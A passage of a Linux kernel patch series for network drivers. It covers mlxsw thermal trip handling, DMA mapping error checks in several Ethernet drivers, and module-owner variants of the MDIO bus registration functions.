+ 	.get_temp	= mlxsw_thermal_module_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -531,11 +414,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -589,7 +467,7 @@ static int mlxsw_thermal_set_cur_state(struct thermal_cooling_device *cdev,
+ 		return idx;
+ 
+ 	/* Normalize the state to the valid speed range. */
+-	state = thermal->cooling_levels[state];
++	state = max_t(unsigned long, MLXSW_THERMAL_MIN_STATE, state);
+ 	mlxsw_reg_mfsc_pack(mfsc_pl, idx, mlxsw_state_to_duty(state));
+ 	err = mlxsw_reg_write(thermal->core, MLXSW_REG(mfsc), mfsc_pl);
+ 	if (err) {
+@@ -617,7 +495,8 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register(tz_name,
++	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++							module_tz->trips,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
+@@ -661,6 +540,8 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
++	memcpy(module_tz->cooling_states, default_cooling_states,
++	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -756,7 +637,8 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
++	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++						gearbox_tz->trips,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -813,6 +695,8 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
++		memcpy(gearbox_tz->cooling_states, default_cooling_states,
++		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -928,6 +812,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
++	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -973,15 +858,12 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 		}
+ 	}
+ 
+-	/* Initialize cooling levels per PWM state. */
+-	for (i = 0; i < MLXSW_THERMAL_MAX_STATE; i++)
+-		thermal->cooling_levels[i] = max(MLXSW_THERMAL_MIN_STATE, i);
+-
+ 	thermal->polling_delay = bus_info->low_frequency ?
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register("mlxsw",
++	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
++						      thermal->trips,
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+index 045a24cacfa51..b6ee2d658b0c4 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+@@ -1354,7 +1354,7 @@ static int mlxsw_sp_fid_8021q_port_vid_map(struct mlxsw_sp_fid *fid,
+ 					   u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 	int err;
+ 
+ 	/* In case there are no {Port, VID} => FID mappings on the port,
+@@ -1391,7 +1391,7 @@ mlxsw_sp_fid_8021q_port_vid_unmap(struct mlxsw_sp_fid *fid,
+ 				  struct mlxsw_sp_port *mlxsw_sp_port, u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 
+ 	mlxsw_sp_fid_port_vid_list_del(fid, mlxsw_sp_port->local_port, vid);
+ 	mlxsw_sp_fid_evid_map(fid, local_port, vid, false);
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index 1478c3b21af15..cb196775489e2 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -611,7 +611,8 @@ static int ocelot_prepare_stats_regions(struct ocelot *ocelot)
+ 		if (!ocelot_stats_layout[i].reg)
+ 			continue;
+ 
+-		if (region && ocelot_stats_layout[i].reg == last + 4) {
++		if (region && ocelot->map[SYS][ocelot_stats_layout[i].reg & REG_MASK] ==
++		    ocelot->map[SYS][last & REG_MASK] + 4) {
+ 			region->count++;
+ 		} else {
+ 			region = devm_kzalloc(ocelot->dev, sizeof(*region),
+diff --git a/drivers/net/ethernet/natsemi/sonic.c b/drivers/net/ethernet/natsemi/sonic.c
+index d17d1b4f2585f..825356ee3492e 100644
+--- a/drivers/net/ethernet/natsemi/sonic.c
++++ b/drivers/net/ethernet/natsemi/sonic.c
+@@ -292,7 +292,7 @@ static int sonic_send_packet(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 
+ 	laddr = dma_map_single(lp->device, skb->data, length, DMA_TO_DEVICE);
+-	if (!laddr) {
++	if (dma_mapping_error(lp->device, laddr)) {
+ 		pr_err_ratelimited("%s: failed to map tx DMA buffer.\n", dev->name);
+ 		dev_kfree_skb_any(skb);
+ 		return NETDEV_TX_OK;
+@@ -509,7 +509,7 @@ static bool sonic_alloc_rb(struct net_device *dev, struct sonic_local *lp,
+ 
+ 	*new_addr = dma_map_single(lp->device, skb_put(*new_skb, SONIC_RBSIZE),
+ 				   SONIC_RBSIZE, DMA_FROM_DEVICE);
+-	if (!*new_addr) {
++	if (dma_mapping_error(lp->device, *new_addr)) {
+ 		dev_kfree_skb(*new_skb);
+ 		*new_skb = NULL;
+ 		return false;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_sriov.c b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+index 0848b5529d48a..911509c2b17d5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_sriov.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+@@ -4404,6 +4404,9 @@ qed_iov_configure_min_tx_rate(struct qed_dev *cdev, int vfid, u32 rate)
+ 	}
+ 
+ 	vf = qed_iov_get_vf_info(QED_LEADING_HWFN(cdev), (u16)vfid, true);
++	if (!vf)
++		return -EINVAL;
++
+ 	vport_id = vf->vport_id;
+ 
+ 	return qed_configure_vport_wfq(cdev, vport_id, rate);
+@@ -5152,7 +5155,7 @@ static void qed_iov_handle_trust_change(struct qed_hwfn *hwfn)
+ 
+ 		/* Validate that the VF has a configured vport */
+ 		vf = qed_iov_get_vf_info(hwfn, i, true);
+-		if (!vf->vport_instance)
++		if (!vf || !vf->vport_instance)
+ 			continue;
+ 
+ 		memset(&params, 0, sizeof(params));
+diff --git a/drivers/net/ethernet/qualcomm/emac/emac.c b/drivers/net/ethernet/qualcomm/emac/emac.c
+index 3115b2c128980..eaa50050aa0b7 100644
+--- a/drivers/net/ethernet/qualcomm/emac/emac.c
++++ b/drivers/net/ethernet/qualcomm/emac/emac.c
+@@ -724,9 +724,15 @@ static int emac_remove(struct platform_device *pdev)
+ 	struct net_device *netdev = dev_get_drvdata(&pdev->dev);
+ 	struct emac_adapter *adpt = netdev_priv(netdev);
+ 
++	netif_carrier_off(netdev);
++	netif_tx_disable(netdev);
++
+ 	unregister_netdev(netdev);
+ 	netif_napi_del(&adpt->rx_q.napi);
+ 
++	free_irq(adpt->irq.irq, &adpt->irq);
++	cancel_work_sync(&adpt->work_thread);
++
+ 	emac_clks_teardown(adpt);
+ 
+ 	put_device(&adpt->phydev->mdio.dev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 6b5d96bced475..ec9c130276d89 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -418,6 +418,7 @@ struct dma_features {
+ 	unsigned int frpbs;
+ 	unsigned int frpes;
+ 	unsigned int addr64;
++	unsigned int host_dma_width;
+ 	unsigned int rssen;
+ 	unsigned int vlhash;
+ 	unsigned int sphen;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+index bd52fb7cf4860..0d6a84199fd8a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+@@ -251,7 +251,7 @@ static int imx_dwmac_probe(struct platform_device *pdev)
+ 		goto err_parse_dt;
+ 	}
+ 
+-	plat_dat->addr64 = dwmac->ops->addr_width;
++	plat_dat->host_dma_width = dwmac->ops->addr_width;
+ 	plat_dat->init = imx_dwmac_init;
+ 	plat_dat->exit = imx_dwmac_exit;
+ 	plat_dat->clks_config = imx_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 7deb1f817dacc..13aa919633b47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -684,7 +684,7 @@ static int ehl_pse0_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 2;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+@@ -725,7 +725,7 @@ static int ehl_pse1_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 3;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index 2f7d8e4561d92..9ae31e3dc8218 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -591,7 +591,7 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->use_phy_wol = priv_plat->mac_wol ? 0 : 1;
+ 	plat->riwt_off = 1;
+ 	plat->maxmtu = ETH_DATA_LEN;
+-	plat->addr64 = priv_plat->variant->dma_bit_mask;
++	plat->host_dma_width = priv_plat->variant->dma_bit_mask;
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 01f7e19a2ca8b..7389718b4797b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1431,7 +1431,7 @@ static int stmmac_init_rx_buffers(struct stmmac_priv *priv,
+ 	struct stmmac_rx_buffer *buf = &rx_q->buf_pool[i];
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	if (!buf->page) {
+@@ -4587,7 +4587,7 @@ static inline void stmmac_rx_refill(struct stmmac_priv *priv, u32 queue)
+ 	unsigned int entry = rx_q->dirty_rx;
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	while (dirty-- > 0) {
+@@ -6203,7 +6203,7 @@ static int stmmac_dma_cap_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq, "\tFlexible RX Parser: %s\n",
+ 		   priv->dma_cap.frpsel ? "Y" : "N");
+ 	seq_printf(seq, "\tEnhanced Addressing: %d\n",
+-		   priv->dma_cap.addr64);
++		   priv->dma_cap.host_dma_width);
+ 	seq_printf(seq, "\tReceive Side Scaling: %s\n",
+ 		   priv->dma_cap.rssen ? "Y" : "N");
+ 	seq_printf(seq, "\tVLAN Hash Filtering: %s\n",
+@@ -7173,20 +7173,22 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_info(priv->device, "SPH feature enabled\n");
+ 	}
+ 
+-	/* The current IP register MAC_HW_Feature1[ADDR64] only define
+-	 * 32/40/64 bit width, but some SOC support others like i.MX8MP
+-	 * support 34 bits but it map to 40 bits width in MAC_HW_Feature1[ADDR64].
+-	 * So overwrite dma_cap.addr64 according to HW real design.
++	/* Ideally our host DMA address width is the same as for the
++	 * device. However, it may differ and then we have to use our
++	 * host DMA width for allocation and the device DMA width for
++	 * register handling.
+ 	 */
+-	if (priv->plat->addr64)
+-		priv->dma_cap.addr64 = priv->plat->addr64;
++	if (priv->plat->host_dma_width)
++		priv->dma_cap.host_dma_width = priv->plat->host_dma_width;
++	else
++		priv->dma_cap.host_dma_width = priv->dma_cap.addr64;
+ 
+-	if (priv->dma_cap.addr64) {
++	if (priv->dma_cap.host_dma_width) {
+ 		ret = dma_set_mask_and_coherent(device,
+-				DMA_BIT_MASK(priv->dma_cap.addr64));
++				DMA_BIT_MASK(priv->dma_cap.host_dma_width));
+ 		if (!ret) {
+-			dev_info(priv->device, "Using %d bits DMA width\n",
+-				 priv->dma_cap.addr64);
++			dev_info(priv->device, "Using %d/%d bits DMA host/device width\n",
++				 priv->dma_cap.host_dma_width, priv->dma_cap.addr64);
+ 
+ 			/*
+ 			 * If more than 32 bits can be addressed, make sure to
+@@ -7201,7 +7203,7 @@ int stmmac_dvr_probe(struct device *device,
+ 				goto error_hw_init;
+ 			}
+ 
+-			priv->dma_cap.addr64 = 32;
++			priv->dma_cap.host_dma_width = 32;
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.c b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+index cf8de8a7a8a1e..9d535ae596266 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+@@ -317,15 +317,17 @@ static int gelic_card_init_chain(struct gelic_card *card,
+ 
+ 	/* set up the hardware pointers in each descriptor */
+ 	for (i = 0; i < no; i++, descr++) {
++		dma_addr_t cpu_addr;
++
+ 		gelic_descr_set_status(descr, GELIC_DESCR_DMA_NOT_IN_USE);
+-		descr->bus_addr =
+-			dma_map_single(ctodev(card), descr,
+-				       GELIC_DESCR_SIZE,
+-				       DMA_BIDIRECTIONAL);
+ 
+-		if (!descr->bus_addr)
++		cpu_addr = dma_map_single(ctodev(card), descr,
++					  GELIC_DESCR_SIZE, DMA_BIDIRECTIONAL);
++
++		if (dma_mapping_error(ctodev(card), cpu_addr))
+ 			goto iommu_error;
+ 
++		descr->bus_addr = cpu_to_be32(cpu_addr);
+ 		descr->next = descr + 1;
+ 		descr->prev = descr - 1;
+ 	}
+@@ -365,26 +367,28 @@ iommu_error:
+  *
+  * allocates a new rx skb, iommu-maps it and attaches it to the descriptor.
+  * Activate the descriptor state-wise
++ *
++ * Gelic RX sk_buffs must be aligned to GELIC_NET_RXBUF_ALIGN and the length
++ * must be a multiple of GELIC_NET_RXBUF_ALIGN.
+  */
+ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 				  struct gelic_descr *descr)
+ {
++	static const unsigned int rx_skb_size =
++		ALIGN(GELIC_NET_MAX_FRAME, GELIC_NET_RXBUF_ALIGN) +
++		GELIC_NET_RXBUF_ALIGN - 1;
++	dma_addr_t cpu_addr;
+ 	int offset;
+-	unsigned int bufsize;
+ 
+ 	if (gelic_descr_get_status(descr) !=  GELIC_DESCR_DMA_NOT_IN_USE)
+ 		dev_info(ctodev(card), "%s: ERROR status\n", __func__);
+-	/* we need to round up the buffer size to a multiple of 128 */
+-	bufsize = ALIGN(GELIC_NET_MAX_MTU, GELIC_NET_RXBUF_ALIGN);
+ 
+-	/* and we need to have it 128 byte aligned, therefore we allocate a
+-	 * bit more */
+-	descr->skb = dev_alloc_skb(bufsize + GELIC_NET_RXBUF_ALIGN - 1);
++	descr->skb = netdev_alloc_skb(*card->netdev, rx_skb_size);
+ 	if (!descr->skb) {
+ 		descr->buf_addr = 0; /* tell DMAC don't touch memory */
+ 		return -ENOMEM;
+ 	}
+-	descr->buf_size = cpu_to_be32(bufsize);
++	descr->buf_size = cpu_to_be32(rx_skb_size);
+ 	descr->dmac_cmd_status = 0;
+ 	descr->result_size = 0;
+ 	descr->valid_size = 0;
+@@ -395,11 +399,10 @@ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 	if (offset)
+ 		skb_reserve(descr->skb, GELIC_NET_RXBUF_ALIGN - offset);
+ 	/* io-mmu-map the skb */
+-	descr->buf_addr = cpu_to_be32(dma_map_single(ctodev(card),
+-						     descr->skb->data,
+-						     GELIC_NET_MAX_MTU,
+-						     DMA_FROM_DEVICE));
+-	if (!descr->buf_addr) {
++	cpu_addr = dma_map_single(ctodev(card), descr->skb->data,
++				  GELIC_NET_MAX_FRAME, DMA_FROM_DEVICE);
++	descr->buf_addr = cpu_to_be32(cpu_addr);
++	if (dma_mapping_error(ctodev(card), cpu_addr)) {
+ 		dev_kfree_skb_any(descr->skb);
+ 		descr->skb = NULL;
+ 		dev_info(ctodev(card),
+@@ -779,7 +782,7 @@ static int gelic_descr_prepare_tx(struct gelic_card *card,
+ 
+ 	buf = dma_map_single(ctodev(card), skb->data, skb->len, DMA_TO_DEVICE);
+ 
+-	if (!buf) {
++	if (dma_mapping_error(ctodev(card), buf)) {
+ 		dev_err(ctodev(card),
+ 			"dma map 2 failed (%p, %i). Dropping packet\n",
+ 			skb->data, skb->len);
+@@ -915,7 +918,7 @@ static void gelic_net_pass_skb_up(struct gelic_descr *descr,
+ 	data_error = be32_to_cpu(descr->data_error);
+ 	/* unmap skb buffer */
+ 	dma_unmap_single(ctodev(card), be32_to_cpu(descr->buf_addr),
+-			 GELIC_NET_MAX_MTU,
++			 GELIC_NET_MAX_FRAME,
+ 			 DMA_FROM_DEVICE);
+ 
+ 	skb_put(skb, be32_to_cpu(descr->valid_size)?
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.h b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+index 68f324ed4eaf0..0d98defb011ed 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.h
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+@@ -19,8 +19,9 @@
+ #define GELIC_NET_RX_DESCRIPTORS        128 /* num of descriptors */
+ #define GELIC_NET_TX_DESCRIPTORS        128 /* num of descriptors */
+ 
+-#define GELIC_NET_MAX_MTU               VLAN_ETH_FRAME_LEN
+-#define GELIC_NET_MIN_MTU               VLAN_ETH_ZLEN
++#define GELIC_NET_MAX_FRAME             2312
++#define GELIC_NET_MAX_MTU               2294
++#define GELIC_NET_MIN_MTU               64
+ #define GELIC_NET_RXBUF_ALIGN           128
+ #define GELIC_CARD_RX_CSUM_DEFAULT      1 /* hw chksum */
+ #define GELIC_NET_WATCHDOG_TIMEOUT      5*HZ
+diff --git a/drivers/net/ethernet/xircom/xirc2ps_cs.c b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+index 894e92ef415b9..9f505cf02d965 100644
+--- a/drivers/net/ethernet/xircom/xirc2ps_cs.c
++++ b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+@@ -503,6 +503,11 @@ static void
+ xirc2ps_detach(struct pcmcia_device *link)
+ {
+     struct net_device *dev = link->priv;
++    struct local_info *local = netdev_priv(dev);
++
++    netif_carrier_off(dev);
++    netif_tx_disable(dev);
++    cancel_work_sync(&local->tx_timeout_task);
+ 
+     dev_dbg(&link->dev, "detach\n");
+ 
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index e1a569b99e4a6..0b0c6c0764fe9 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1913,6 +1913,8 @@ static int ca8210_skb_tx(
+ 	 * packet
+ 	 */
+ 	mac_len = ieee802154_hdr_peek_addrs(skb, &header);
++	if (mac_len < 0)
++		return mac_len;
+ 
+ 	secspec.security_level = header.sec.level;
+ 	secspec.key_id_mode = header.sec.key_id_mode;
+diff --git a/drivers/net/mdio/acpi_mdio.c b/drivers/net/mdio/acpi_mdio.c
+index d77c987fda9cd..4630dde019749 100644
+--- a/drivers/net/mdio/acpi_mdio.c
++++ b/drivers/net/mdio/acpi_mdio.c
+@@ -18,16 +18,18 @@ MODULE_AUTHOR("Calvin Johnson <calvin.johnson@oss.nxp.com>");
+ MODULE_LICENSE("GPL");
+ 
+ /**
+- * acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
++ * __acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
+  * @mdio: pointer to mii_bus structure
+  * @fwnode: pointer to fwnode of MDIO bus. This fwnode is expected to represent
++ * @owner: module owning this @mdio object.
+  * an ACPI device object corresponding to the MDIO bus and its children are
+  * expected to correspond to the PHY devices on that bus.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @fwnode.
+  */
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner)
+ {
+ 	struct fwnode_handle *child;
+ 	u32 addr;
+@@ -35,7 +37,7 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 
+ 	/* Mask out all PHYs from auto probing. */
+ 	mdio->phy_mask = GENMASK(31, 0);
+-	ret = mdiobus_register(mdio);
++	ret = __mdiobus_register(mdio, owner);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -55,4 +57,4 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 	}
+ 	return 0;
+ }
+-EXPORT_SYMBOL(acpi_mdiobus_register);
++EXPORT_SYMBOL(__acpi_mdiobus_register);
+diff --git a/drivers/net/mdio/mdio-thunder.c b/drivers/net/mdio/mdio-thunder.c
+index 822d2cdd2f359..394b864aaa372 100644
+--- a/drivers/net/mdio/mdio-thunder.c
++++ b/drivers/net/mdio/mdio-thunder.c
+@@ -104,6 +104,7 @@ static int thunder_mdiobus_pci_probe(struct pci_dev *pdev,
+ 		if (i >= ARRAY_SIZE(nexus->buses))
+ 			break;
+ 	}
++	fwnode_handle_put(fwn);
+ 	return 0;
+ 
+ err_release_regions:
+diff --git a/drivers/net/mdio/of_mdio.c b/drivers/net/mdio/of_mdio.c
+index 510822d6d0d90..1e46e39f5f46a 100644
+--- a/drivers/net/mdio/of_mdio.c
++++ b/drivers/net/mdio/of_mdio.c
+@@ -139,21 +139,23 @@ bool of_mdiobus_child_is_phy(struct device_node *child)
+ EXPORT_SYMBOL(of_mdiobus_child_is_phy);
+ 
+ /**
+- * of_mdiobus_register - Register mii_bus and create PHYs from the device tree
++ * __of_mdiobus_register - Register mii_bus and create PHYs from the device tree
+  * @mdio: pointer to mii_bus structure
+  * @np: pointer to device_node of MDIO bus.
++ * @owner: module owning the @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @np.
+  */
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner)
+ {
+ 	struct device_node *child;
+ 	bool scanphys = false;
+ 	int addr, rc;
+ 
+ 	if (!np)
+-		return mdiobus_register(mdio);
++		return __mdiobus_register(mdio, owner);
+ 
+ 	/* Do not continue if the node is disabled */
+ 	if (!of_device_is_available(np))
+@@ -172,7 +174,7 @@ int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
+ 	of_property_read_u32(np, "reset-post-delay-us", &mdio->reset_post_delay_us);
+ 
+ 	/* Register the MDIO bus */
+-	rc = mdiobus_register(mdio);
++	rc = __mdiobus_register(mdio, owner);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -236,7 +238,7 @@ unregister:
+ 	mdiobus_unregister(mdio);
+ 	return rc;
+ }
+-EXPORT_SYMBOL(of_mdiobus_register);
++EXPORT_SYMBOL(__of_mdiobus_register);
+ 
+ /**
+  * of_mdio_find_device - Given a device tree node, find the mdio_device
+diff --git a/drivers/net/phy/mdio_devres.c b/drivers/net/phy/mdio_devres.c
+index b560e99695dfd..69b829e6ab35b 100644
+--- a/drivers/net/phy/mdio_devres.c
++++ b/drivers/net/phy/mdio_devres.c
+@@ -98,13 +98,14 @@ EXPORT_SYMBOL(__devm_mdiobus_register);
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ /**
+- * devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
++ * __devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
+  * @dev:	Device to register mii_bus for
+  * @mdio:	MII bus structure to register
+  * @np:		Device node to parse
++ * @owner:	Owning module
+  */
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np)
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner)
+ {
+ 	struct mdiobus_devres *dr;
+ 	int ret;
+@@ -117,7 +118,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	if (!dr)
+ 		return -ENOMEM;
+ 
+-	ret = of_mdiobus_register(mdio, np);
++	ret = __of_mdiobus_register(mdio, np, owner);
+ 	if (ret) {
+ 		devres_free(dr);
+ 		return ret;
+@@ -127,7 +128,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	devres_add(dev, dr);
+ 	return 0;
+ }
+-EXPORT_SYMBOL(devm_of_mdiobus_register);
++EXPORT_SYMBOL(__devm_of_mdiobus_register);
+ #endif /* CONFIG_OF_MDIO */
+ 
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c
+index e5b6cb1a77f95..a8bf3c752c8a2 100644
+--- a/drivers/net/phy/phy.c
++++ b/drivers/net/phy/phy.c
+@@ -57,6 +57,18 @@ static const char *phy_state_to_str(enum phy_state st)
+ 	return NULL;
+ }
+ 
++static void phy_process_state_change(struct phy_device *phydev,
++				     enum phy_state old_state)
++{
++	if (old_state != phydev->state) {
++		phydev_dbg(phydev, "PHY state change %s -> %s\n",
++			   phy_state_to_str(old_state),
++			   phy_state_to_str(phydev->state));
++		if (phydev->drv && phydev->drv->link_change_notify)
++			phydev->drv->link_change_notify(phydev);
++	}
++}
++
+ static void phy_link_up(struct phy_device *phydev)
+ {
+ 	phydev->phy_link_change(phydev, true);
+@@ -1094,6 +1106,7 @@ EXPORT_SYMBOL(phy_free_interrupt);
+ void phy_stop(struct phy_device *phydev)
+ {
+ 	struct net_device *dev = phydev->attached_dev;
++	enum phy_state old_state;
+ 
+ 	if (!phy_is_started(phydev) && phydev->state != PHY_DOWN) {
+ 		WARN(1, "called from state %s\n",
+@@ -1102,6 +1115,7 @@ void phy_stop(struct phy_device *phydev)
+ 	}
+ 
